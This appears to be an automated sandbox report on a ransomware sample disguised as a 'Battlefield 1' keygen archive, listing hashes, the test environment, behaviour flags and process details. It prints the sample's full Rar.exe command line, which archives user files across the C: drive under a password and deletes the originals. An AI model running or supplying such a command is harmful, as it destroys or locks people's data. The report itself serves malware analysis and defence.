General Info

File name

Battlefield-1-Keygen-Serial-Key-Generator.rar

Full analysis
https://app.any.run/tasks/c313df68-2381-499f-9ac5-eb963867b689
Verdict
Malicious activity
Analysis date
12/2/2019, 18:33:15
OS:
Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:

ransomware

Indicators:

MIME:
application/x-rar
File info:
RAR archive data, v4, os: Win32
MD5

77aa0c5e2f0229a0754c5142c83af412

SHA1

1c35d845c9d1fbb38728ac64c565a8183587583e

SHA256

d3ba73321ff1e097902dd5cbbbf69aff38e1808f2a6d8c5c66ac54e338c9880d

SSDEEP

12288:/6zqlfEEuVjTRDnrZ8HZDKk/FG5VYGD1KOAbW1GyfuEOSVMSG9WCGOg:/f+EuVd18HZDKk/6YGDq6wyPCSGI

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distored by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

Software environment set and analysis options

Launch configuration

Task duration
300 seconds
Additional time used
240 seconds
Fakenet option
off
Heavy Evaision option
off
MITM proxy
off
Route via Tor
off
Network geolocation
off
Privacy
Public submission
Autoconfirmation of UAC
on

Software preset

  • Internet Explorer 8.0.7601.17514
  • Adobe Acrobat Reader DC MUI (15.023.20070)
  • Adobe Flash Player 26 ActiveX (26.0.0.131)
  • Adobe Flash Player 26 NPAPI (26.0.0.131)
  • Adobe Flash Player 26 PPAPI (26.0.0.131)
  • Adobe Refresh Manager (1.8.0)
  • CCleaner (5.35)
  • FileZilla Client 3.36.0 (3.36.0)
  • Google Chrome (75.0.3770.100)
  • Google Update Helper (1.3.34.7)
  • Java 8 Update 92 (8.0.920.14)
  • Java Auto Updater (2.8.92.14)
  • Microsoft .NET Framework 4.7.2 (4.7.03062)
  • Microsoft Office Access MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Access MUI (French) 2010 (14.0.4763.1000)
  • Microsoft Office Access MUI (German) 2010 (14.0.4763.1000)
  • Microsoft Office Access MUI (Italian) 2010 (14.0.4763.1000)
  • Microsoft Office Access MUI (Japanese) 2010 (14.0.4763.1000)
  • Microsoft Office Access MUI (Korean) 2010 (14.0.4763.1000)
  • Microsoft Office Access MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
  • Microsoft Office Access MUI (Russian) 2010 (14.0.4763.1000)
  • Microsoft Office Access MUI (Spanish) 2010 (14.0.4763.1000)
  • Microsoft Office Access MUI (Turkish) 2010 (14.0.4763.1013)
  • Microsoft Office Access Setup Metadata MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Excel MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Excel MUI (French) 2010 (14.0.4763.1000)
  • Microsoft Office Excel MUI (German) 2010 (14.0.4763.1000)
  • Microsoft Office Excel MUI (Italian) 2010 (14.0.4763.1000)
  • Microsoft Office Excel MUI (Japanese) 2010 (14.0.4763.1000)
  • Microsoft Office Excel MUI (Korean) 2010 (14.0.4763.1000)
  • Microsoft Office Excel MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
  • Microsoft Office Excel MUI (Russian) 2010 (14.0.4763.1000)
  • Microsoft Office Excel MUI (Spanish) 2010 (14.0.4763.1000)
  • Microsoft Office Excel MUI (Turkish) 2010 (14.0.4763.1013)
  • Microsoft Office Groove MUI (French) 2010 (14.0.4763.1000)
  • Microsoft Office Groove MUI (German) 2010 (14.0.4763.1000)
  • Microsoft Office Groove MUI (Italian) 2010 (14.0.4763.1000)
  • Microsoft Office Groove MUI (Japanese) 2010 (14.0.4763.1000)
  • Microsoft Office Groove MUI (Korean) 2010 (14.0.4763.1000)
  • Microsoft Office Groove MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
  • Microsoft Office Groove MUI (Russian) 2010 (14.0.4763.1000)
  • Microsoft Office Groove MUI (Spanish) 2010 (14.0.4763.1000)
  • Microsoft Office Groove MUI (Turkish) 2010 (14.0.4763.1013)
  • Microsoft Office IME (Japanese) 2010 (14.0.4763.1000)
  • Microsoft Office IME (Korean) 2010 (14.0.4763.1000)
  • Microsoft Office InfoPath MUI (French) 2010 (14.0.4763.1000)
  • Microsoft Office InfoPath MUI (German) 2010 (14.0.4763.1000)
  • Microsoft Office InfoPath MUI (Italian) 2010 (14.0.4763.1000)
  • Microsoft Office InfoPath MUI (Japanese) 2010 (14.0.4763.1000)
  • Microsoft Office InfoPath MUI (Korean) 2010 (14.0.4763.1000)
  • Microsoft Office InfoPath MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
  • Microsoft Office InfoPath MUI (Russian) 2010 (14.0.4763.1000)
  • Microsoft Office InfoPath MUI (Spanish) 2010 (14.0.4763.1000)
  • Microsoft Office InfoPath MUI (Turkish) 2010 (14.0.4763.1013)
  • Microsoft Office Language Pack 2010 - French/Français (14.0.4763.1000)
  • Microsoft Office Language Pack 2010 - German/Deutsch (14.0.4763.1000)
  • Microsoft Office Language Pack 2010 - Italian/Italiano (14.0.4763.1000)
  • Microsoft Office Language Pack 2010 - Japanese/日本語 (14.0.4763.1000)
  • Microsoft Office Language Pack 2010 - Korean/한국어 (14.0.4763.1000)
  • Microsoft Office Language Pack 2010 - Portuguese/Português (Brasil) (14.0.4763.1000)
  • Microsoft Office Language Pack 2010 - Russian/русский (14.0.4763.1000)
  • Microsoft Office Language Pack 2010 - Spanish/Español (14.0.4763.1000)
  • Microsoft Office Language Pack 2010 - Turkish/Türkçe (14.0.4763.1013)
  • Microsoft Office O MUI (French) 2010 (14.0.4763.1000)
  • Microsoft Office O MUI (German) 2010 (14.0.4763.1000)
  • Microsoft Office O MUI (Italian) 2010 (14.0.4763.1000)
  • Microsoft Office O MUI (Japanese) 2010 (14.0.4763.1000)
  • Microsoft Office O MUI (Korean) 2010 (14.0.4763.1000)
  • Microsoft Office O MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
  • Microsoft Office O MUI (Russian) 2010 (14.0.4763.1000)
  • Microsoft Office O MUI (Spanish) 2010 (14.0.4763.1000)
  • Microsoft Office O MUI (Turkish) 2010 (14.0.4763.1013)
  • Microsoft Office OneNote MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office OneNote MUI (French) 2010 (14.0.4763.1000)
  • Microsoft Office OneNote MUI (German) 2010 (14.0.4763.1000)
  • Microsoft Office OneNote MUI (Italian) 2010 (14.0.4763.1000)
  • Microsoft Office OneNote MUI (Japanese) 2010 (14.0.4763.1000)
  • Microsoft Office OneNote MUI (Korean) 2010 (14.0.4763.1000)
  • Microsoft Office OneNote MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
  • Microsoft Office OneNote MUI (Russian) 2010 (14.0.4763.1000)
  • Microsoft Office OneNote MUI (Spanish) 2010 (14.0.4763.1000)
  • Microsoft Office OneNote MUI (Turkish) 2010 (14.0.4763.1013)
  • Microsoft Office Outlook MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Outlook MUI (French) 2010 (14.0.4763.1000)
  • Microsoft Office Outlook MUI (German) 2010 (14.0.4763.1000)
  • Microsoft Office Outlook MUI (Italian) 2010 (14.0.4763.1000)
  • Microsoft Office Outlook MUI (Japanese) 2010 (14.0.4763.1000)
  • Microsoft Office Outlook MUI (Korean) 2010 (14.0.4763.1000)
  • Microsoft Office Outlook MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
  • Microsoft Office Outlook MUI (Russian) 2010 (14.0.4763.1000)
  • Microsoft Office Outlook MUI (Spanish) 2010 (14.0.4763.1000)
  • Microsoft Office Outlook MUI (Turkish) 2010 (14.0.4763.1013)
  • Microsoft Office PowerPoint MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office PowerPoint MUI (French) 2010 (14.0.4763.1000)
  • Microsoft Office PowerPoint MUI (German) 2010 (14.0.4763.1000)
  • Microsoft Office PowerPoint MUI (Italian) 2010 (14.0.4763.1000)
  • Microsoft Office PowerPoint MUI (Japanese) 2010 (14.0.4763.1000)
  • Microsoft Office PowerPoint MUI (Korean) 2010 (14.0.4763.1000)
  • Microsoft Office PowerPoint MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
  • Microsoft Office PowerPoint MUI (Russian) 2010 (14.0.4763.1000)
  • Microsoft Office PowerPoint MUI (Spanish) 2010 (14.0.4763.1000)
  • Microsoft Office PowerPoint MUI (Turkish) 2010 (14.0.4763.1013)
  • Microsoft Office Professional 2010 (14.0.6029.1000)
  • Microsoft Office Proof (Arabic) 2010 (14.0.4763.1000)
  • Microsoft Office Proof (Basque) 2010 (14.0.4763.1000)
  • Microsoft Office Proof (Catalan) 2010 (14.0.4763.1000)
  • Microsoft Office Proof (Dutch) 2010 (14.0.4763.1000)
  • Microsoft Office Proof (English) 2010 (14.0.6029.1000)
  • Microsoft Office Proof (French) 2010 (14.0.6029.1000)
  • Microsoft Office Proof (Galician) 2010 (14.0.4763.1000)
  • Microsoft Office Proof (German) 2010 (14.0.4763.1000)
  • Microsoft Office Proof (Italian) 2010 (14.0.4763.1000)
  • Microsoft Office Proof (Japanese) 2010 (14.0.4763.1000)
  • Microsoft Office Proof (Korean) 2010 (14.0.4763.1000)
  • Microsoft Office Proof (Portuguese (Brazil)) 2010 (14.0.4763.1000)
  • Microsoft Office Proof (Russian) 2010 (14.0.4763.1000)
  • Microsoft Office Proof (Spanish) 2010 (14.0.6029.1000)
  • Microsoft Office Proof (Turkish) 2010 (14.0.4763.1013)
  • Microsoft Office Proof (Ukrainian) 2010 (14.0.4763.1000)
  • Microsoft Office Proofing (English) 2010 (14.0.6029.1000)
  • Microsoft Office Proofing (French) 2010 (14.0.4763.1000)
  • Microsoft Office Proofing (German) 2010 (14.0.4763.1000)
  • Microsoft Office Proofing (Italian) 2010 (14.0.4763.1000)
  • Microsoft Office Proofing (Japanese) 2010 (14.0.4763.1000)
  • Microsoft Office Proofing (Korean) 2010 (14.0.4763.1000)
  • Microsoft Office Proofing (Portuguese (Brazil)) 2010 (14.0.4763.1000)
  • Microsoft Office Proofing (Russian) 2010 (14.0.4763.1000)
  • Microsoft Office Proofing (Spanish) 2010 (14.0.4763.1000)
  • Microsoft Office Proofing (Turkish) 2010 (14.0.4763.1013)
  • Microsoft Office Publisher MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Publisher MUI (French) 2010 (14.0.4763.1000)
  • Microsoft Office Publisher MUI (German) 2010 (14.0.4763.1000)
  • Microsoft Office Publisher MUI (Italian) 2010 (14.0.4763.1000)
  • Microsoft Office Publisher MUI (Japanese) 2010 (14.0.4763.1000)
  • Microsoft Office Publisher MUI (Korean) 2010 (14.0.4763.1000)
  • Microsoft Office Publisher MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
  • Microsoft Office Publisher MUI (Russian) 2010 (14.0.4763.1000)
  • Microsoft Office Publisher MUI (Spanish) 2010 (14.0.4763.1000)
  • Microsoft Office Publisher MUI (Turkish) 2010 (14.0.4763.1013)
  • Microsoft Office SharePoint Designer MUI (French) 2010 (14.0.4763.1000)
  • Microsoft Office SharePoint Designer MUI (German) 2010 (14.0.4763.1000)
  • Microsoft Office SharePoint Designer MUI (Italian) 2010 (14.0.4763.1000)
  • Microsoft Office SharePoint Designer MUI (Japanese) 2010 (14.0.4763.1000)
  • Microsoft Office SharePoint Designer MUI (Korean) 2010 (14.0.4763.1000)
  • Microsoft Office SharePoint Designer MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
  • Microsoft Office SharePoint Designer MUI (Russian) 2010 (14.0.4763.1000)
  • Microsoft Office SharePoint Designer MUI (Spanish) 2010 (14.0.4763.1000)
  • Microsoft Office SharePoint Designer MUI (Turkish) 2010 (14.0.4763.1013)
  • Microsoft Office Shared MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Shared MUI (French) 2010 (14.0.4763.1000)
  • Microsoft Office Shared MUI (German) 2010 (14.0.4763.1000)
  • Microsoft Office Shared MUI (Italian) 2010 (14.0.4763.1000)
  • Microsoft Office Shared MUI (Japanese) 2010 (14.0.4763.1000)
  • Microsoft Office Shared MUI (Korean) 2010 (14.0.4763.1000)
  • Microsoft Office Shared MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
  • Microsoft Office Shared MUI (Russian) 2010 (14.0.4763.1000)
  • Microsoft Office Shared MUI (Spanish) 2010 (14.0.4763.1000)
  • Microsoft Office Shared MUI (Turkish) 2010 (14.0.4763.1013)
  • Microsoft Office Shared Setup Metadata MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Single Image 2010 (14.0.6029.1000)
  • Microsoft Office Word MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Word MUI (French) 2010 (14.0.4763.1000)
  • Microsoft Office Word MUI (German) 2010 (14.0.4763.1000)
  • Microsoft Office Word MUI (Italian) 2010 (14.0.4763.1000)
  • Microsoft Office Word MUI (Japanese) 2010 (14.0.4763.1000)
  • Microsoft Office Word MUI (Korean) 2010 (14.0.4763.1000)
  • Microsoft Office Word MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
  • Microsoft Office Word MUI (Russian) 2010 (14.0.4763.1000)
  • Microsoft Office Word MUI (Spanish) 2010 (14.0.4763.1000)
  • Microsoft Office Word MUI (Turkish) 2010 (14.0.4763.1013)
  • Microsoft Office X MUI (French) 2010 (14.0.4763.1000)
  • Microsoft Office X MUI (German) 2010 (14.0.4763.1000)
  • Microsoft Office X MUI (Italian) 2010 (14.0.4763.1000)
  • Microsoft Office X MUI (Japanese) 2010 (14.0.4763.1000)
  • Microsoft Office X MUI (Korean) 2010 (14.0.4763.1000)
  • Microsoft Office X MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
  • Microsoft Office X MUI (Russian) 2010 (14.0.4763.1000)
  • Microsoft Office X MUI (Spanish) 2010 (14.0.4763.1000)
  • Microsoft Office X MUI (Turkish) 2010 (14.0.4763.1013)
  • Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (9.0.30729.6161)
  • Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (10.0.40219)
  • Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (12.0.30501.0)
  • Microsoft Visual C++ 2013 x86 Additional Runtime - 12.0.21005 (12.0.21005)
  • Microsoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 (12.0.21005)
  • Microsoft Visual C++ 2015-2019 Redistributable (x86) - 14.21.27702 (14.21.27702.2)
  • Microsoft Visual C++ 2019 X86 Additional Runtime - 14.21.27702 (14.21.27702)
  • Microsoft Visual C++ 2019 X86 Minimum Runtime - 14.21.27702 (14.21.27702)
  • Mozilla Firefox 68.0.1 (x86 en-US) (68.0.1)
  • Notepad++ (32-bit x86) (7.5.1)
  • Opera 12.15 (12.15.1748)
  • Skype version 8.29 (8.29)
  • Update for Microsoft .NET Framework 4.7.2 (KB4087364) (1)
  • VLC media player (2.2.6)
  • WinRAR 5.60 (32-bit) (5.60.0)

Hotfixes

  • Client LanguagePack Package
  • Client Refresh LanguagePack Package
  • CodecPack Basic Package
  • Foundation Package
  • IE Troubleshooters Package
  • InternetExplorer Optional Package
  • KB2534111
  • KB2999226
  • KB4019990
  • KB976902
  • LocalPack AU Package
  • LocalPack CA Package
  • LocalPack GB Package
  • LocalPack US Package
  • LocalPack ZA Package
  • ProfessionalEdition
  • UltimateEdition

Behavior activities

MALICIOUS SUSPICIOUS INFO
Application was dropped or rewritten from another process
  • Battlefield-1-Keygen-Serial-Key-Generator.exe (PID: 2484)
 Creates files like Ransomware instruction
  • Battlefield-1-Keygen-Serial-Key-Generator.exe (PID: 2484)
Executed via COM
  • DllHost.exe (PID: 992)
Executable content was dropped or overwritten
  • WinRAR.exe (PID: 2620)
 Dropped object may contain TOR URL's
  • Battlefield-1-Keygen-Serial-Key-Generator.exe (PID: 2484)

Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

Static information

TRiD
.rar
|   RAR compressed archive (v-4.x) (58.3%)
.rar
|   RAR compressed archive (gen) (41.6%)
EXIF
ZIP
CompressedSize:
669128
UncompressedSize:
736256
OperatingSystem:
Win32
ModifyDate:
2016:05:26 11:50:28
PackingMethod:
Normal
ArchivedFileName:
Battlefield-1-Keygen-Serial-Key-Generator.exe

Screenshots

Screenshot of d3ba73321ff1e097902dd5cbbbf69aff38e1808f2a6d8c5c66ac54e338c9880d taken from 17401 ms from task started Screenshot of d3ba73321ff1e097902dd5cbbbf69aff38e1808f2a6d8c5c66ac54e338c9880d taken from 22432 ms from task started Screenshot of d3ba73321ff1e097902dd5cbbbf69aff38e1808f2a6d8c5c66ac54e338c9880d taken from 27493 ms from task started Screenshot of d3ba73321ff1e097902dd5cbbbf69aff38e1808f2a6d8c5c66ac54e338c9880d taken from 30494 ms from task started Screenshot of d3ba73321ff1e097902dd5cbbbf69aff38e1808f2a6d8c5c66ac54e338c9880d taken from 41509 ms from task started Screenshot of d3ba73321ff1e097902dd5cbbbf69aff38e1808f2a6d8c5c66ac54e338c9880d taken from 49564 ms from task started Screenshot of d3ba73321ff1e097902dd5cbbbf69aff38e1808f2a6d8c5c66ac54e338c9880d taken from 50580 ms from task started Screenshot of d3ba73321ff1e097902dd5cbbbf69aff38e1808f2a6d8c5c66ac54e338c9880d taken from 51602 ms from task started Screenshot of d3ba73321ff1e097902dd5cbbbf69aff38e1808f2a6d8c5c66ac54e338c9880d taken from 52602 ms from task started Screenshot of d3ba73321ff1e097902dd5cbbbf69aff38e1808f2a6d8c5c66ac54e338c9880d taken from 53608 ms from task started Screenshot of d3ba73321ff1e097902dd5cbbbf69aff38e1808f2a6d8c5c66ac54e338c9880d taken from 54609 ms from task started Screenshot of d3ba73321ff1e097902dd5cbbbf69aff38e1808f2a6d8c5c66ac54e338c9880d taken from 55609 ms from task started Screenshot of d3ba73321ff1e097902dd5cbbbf69aff38e1808f2a6d8c5c66ac54e338c9880d taken from 59578 ms from task started Screenshot of d3ba73321ff1e097902dd5cbbbf69aff38e1808f2a6d8c5c66ac54e338c9880d taken from 61594 ms from task started Screenshot of d3ba73321ff1e097902dd5cbbbf69aff38e1808f2a6d8c5c66ac54e338c9880d taken from 64596 ms from task started Screenshot of d3ba73321ff1e097902dd5cbbbf69aff38e1808f2a6d8c5c66ac54e338c9880d taken from 68600 ms from task started Screenshot of d3ba73321ff1e097902dd5cbbbf69aff38e1808f2a6d8c5c66ac54e338c9880d taken from 70615 ms from task started Screenshot of d3ba73321ff1e097902dd5cbbbf69aff38e1808f2a6d8c5c66ac54e338c9880d taken from 76655 ms from task started Screenshot of d3ba73321ff1e097902dd5cbbbf69aff38e1808f2a6d8c5c66ac54e338c9880d taken from 79659 ms from task started Screenshot of d3ba73321ff1e097902dd5cbbbf69aff38e1808f2a6d8c5c66ac54e338c9880d taken from 80660 ms from task started Screenshot of d3ba73321ff1e097902dd5cbbbf69aff38e1808f2a6d8c5c66ac54e338c9880d taken from 82661 ms from task started Screenshot of d3ba73321ff1e097902dd5cbbbf69aff38e1808f2a6d8c5c66ac54e338c9880d taken from 84667 ms from task started Screenshot of d3ba73321ff1e097902dd5cbbbf69aff38e1808f2a6d8c5c66ac54e338c9880d taken from 85668 ms from task started Screenshot of d3ba73321ff1e097902dd5cbbbf69aff38e1808f2a6d8c5c66ac54e338c9880d taken from 88681 ms from task started Screenshot of d3ba73321ff1e097902dd5cbbbf69aff38e1808f2a6d8c5c66ac54e338c9880d taken from 89681 ms from task started Screenshot of d3ba73321ff1e097902dd5cbbbf69aff38e1808f2a6d8c5c66ac54e338c9880d taken from 90681 ms from task started Screenshot of d3ba73321ff1e097902dd5cbbbf69aff38e1808f2a6d8c5c66ac54e338c9880d taken from 91684 ms from task started Screenshot of d3ba73321ff1e097902dd5cbbbf69aff38e1808f2a6d8c5c66ac54e338c9880d taken from 93685 ms from task started Screenshot of d3ba73321ff1e097902dd5cbbbf69aff38e1808f2a6d8c5c66ac54e338c9880d taken from 94686 ms from task started Screenshot of d3ba73321ff1e097902dd5cbbbf69aff38e1808f2a6d8c5c66ac54e338c9880d taken from 98687 ms from task started Screenshot of d3ba73321ff1e097902dd5cbbbf69aff38e1808f2a6d8c5c66ac54e338c9880d taken from 115698 ms from task started Screenshot of d3ba73321ff1e097902dd5cbbbf69aff38e1808f2a6d8c5c66ac54e338c9880d taken from 125699 ms from task started

Processes

Total processes
40
Monitored processes
4
Malicious processes
1
Suspicious processes
1

Behavior graph

+
drop and start start winrar.exe battlefield-1-keygen-serial-key-generator.exe no specs rar.exe no specs PhotoViewer.dll no specs
Specs description
Program did not start
Integrity level elevation
Task сontains an error or was rebooted
Process has crashed
Task contains several apps running
Executable file was dropped
Debug information is available
Process was injected
Network attacks were detected
Application downloaded the executable file
Actions similar to stealing personal data
Behavior similar to exploiting the vulnerability
Inspected object has sucpicious PE structure
File is detected by antivirus software
CPU overrun
RAM overrun
Process starts the services
Process was added to the startup
Behavior similar to spam
Low-level access to the HDD
Probably Tor was used
System was rebooted
Connects to the network
Known threat

Process information

Click at the process to see the details.

PID
2620
CMD
"C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\Battlefield-1-Keygen-Serial-Key-Generator.rar"
Path
C:\Program Files\WinRAR\WinRAR.exe
Indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Version:
Company
Alexander Roshal
Description
WinRAR archiver
Version
5.60.0
Modules
Image
c:\program files\winrar\winrar.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\comdlg32.dll
c:\windows\system32\shlwapi.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\shell32.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\powrprof.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\uxtheme.dll
c:\windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\gdiplus.dll
c:\windows\system32\msimg32.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\api-ms-win-core-synch-l1-2-0.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\propsys.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\riched20.dll
c:\program files\common files\microsoft shared\ink\tiptsf.dll
c:\windows\system32\windowscodecs.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\ehstorshell.dll
c:\windows\system32\cscui.dll
c:\windows\system32\cscdll.dll
c:\windows\system32\cscapi.dll
c:\windows\system32\ntshrui.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\slc.dll
c:\windows\system32\imageres.dll
c:\windows\system32\mpr.dll
c:\windows\system32\drprov.dll
c:\windows\system32\winsta.dll
c:\windows\system32\ntlanman.dll
c:\windows\system32\davclnt.dll
c:\windows\system32\davhlpr.dll
c:\windows\system32\wkscli.dll
c:\windows\system32\netutils.dll
c:\windows\system32\wpdshext.dll
c:\windows\system32\winmm.dll
c:\windows\system32\portabledeviceapi.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\audiodev.dll
c:\windows\system32\wmvcore.dll
c:\windows\system32\wmasf.dll
c:\windows\system32\ehstorapi.dll
c:\windows\system32\shdocvw.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\samcli.dll
c:\windows\system32\samlib.dll
c:\windows\system32\profapi.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\explorerframe.dll
c:\windows\system32\duser.dll
c:\windows\system32\dui70.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\iertutil.dll
c:\users\admin\appdata\local\temp\rar$exa2620.2142\battlefield-1-keygen-serial-key-generator.exe

PID
2484
CMD
"C:\Users\admin\AppData\Local\Temp\Rar$EXa2620.2142\Battlefield-1-Keygen-Serial-Key-Generator.exe"
Path
C:\Users\admin\AppData\Local\Temp\Rar$EXa2620.2142\Battlefield-1-Keygen-Serial-Key-Generator.exe
Indicators
No indicators
Parent process
WinRAR.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Description
Runners
Version
1.0.0.0
Modules
Image
c:\users\admin\appdata\local\temp\rar$exa2620.2142\battlefield-1-keygen-serial-key-generator.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ole32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\version.dll
c:\windows\microsoft.net\framework\v2.0.50727\mscorwks.dll
c:\windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.4940_none_d08cc06a442b34fc\msvcr80.dll
c:\windows\system32\shell32.dll
c:\windows\system32\profapi.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\mscorlib\62a0b3e4b40ec0e8c5cfaa0c8848e64a\mscorlib.ni.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\microsoft.net\framework\v2.0.50727\mscorjit.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system\9e0a3b9b9f457233a335d7fba8f95419\system.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.drawing\dbfe8642a8ed7b2b103ad28e0c96418a\system.drawing.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.windows.forms\3afcd5168c7a6cb02eab99d7fd71e102\system.windows.forms.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.visualbas#\08d608378aa405adc844f3cf36974b8c\microsoft.visualbasic.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.management\6f3b99ed0b791ff4d8aa52f2f0cd0bcf\system.management.ni.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\wbem\wmiutils.dll
c:\windows\system32\wbemcomn.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\system32\wbem\wbemprox.dll
c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll
c:\windows\system32\wbem\wbemsvc.dll
c:\windows\system32\wbem\fastprox.dll
c:\windows\system32\ntdsapi.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.configuration\bc09ad2d49d8535371845cd7532f9271\system.configuration.ni.dll
c:\windows\system32\shfolder.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.xml\461d3b6b3f43e6fbe6c897d5936e17e4\system.xml.ni.dll
c:\windows\system32\propsys.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\apphelp.dll
c:\program files\winrar\rar.exe
c:\windows\microsoft.net\framework\v2.0.50727\culture.dll
c:\windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\gdiplus.dll
c:\windows\system32\windowscodecs.dll
c:\windows\system32\iconcodecservice.dll

PID
3036
CMD
"C:\Program Files\Winrar\Rar.exe" u C:\YOUR-locked-FILES\YourFilesHere-0penWithWinrar.ace -inul -os -ow -r -df -pfW?3*m6P7Ek$Qi/5 -x*.rar C:\*.txt C:\*.doc* C:\*.xls* C:\*.ppt* C:\*.zip C:\*.mdb C:\*.acc* C:\*.mdb* C:\*.avi* C:\*.wma* C:\*.csv* *.csv* C:\*.jpg* C:\*.png* C:\*.svg* C:\*.wallet* C:\*.eps* C:\*.pdf* C:\*.psd* C:\*.dxg* C:\*.dwg* *.rar* *.7z* *.php* *.css* *.js* *.cfm* *.cfc* *.sql* *.tar* *.backup* *.html *.dat *.sln *.c *.MYD *.MYI *.frm
Path
C:\Program Files\Winrar\Rar.exe
Indicators
No indicators
Parent process
Battlefield-1-Keygen-Serial-Key-Generator.exe
User
admin
Integrity Level
MEDIUM
Version:
Company
Alexander Roshal
Description
Command line RAR
Version
5.60.0
Modules
Image
c:\program files\winrar\rar.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
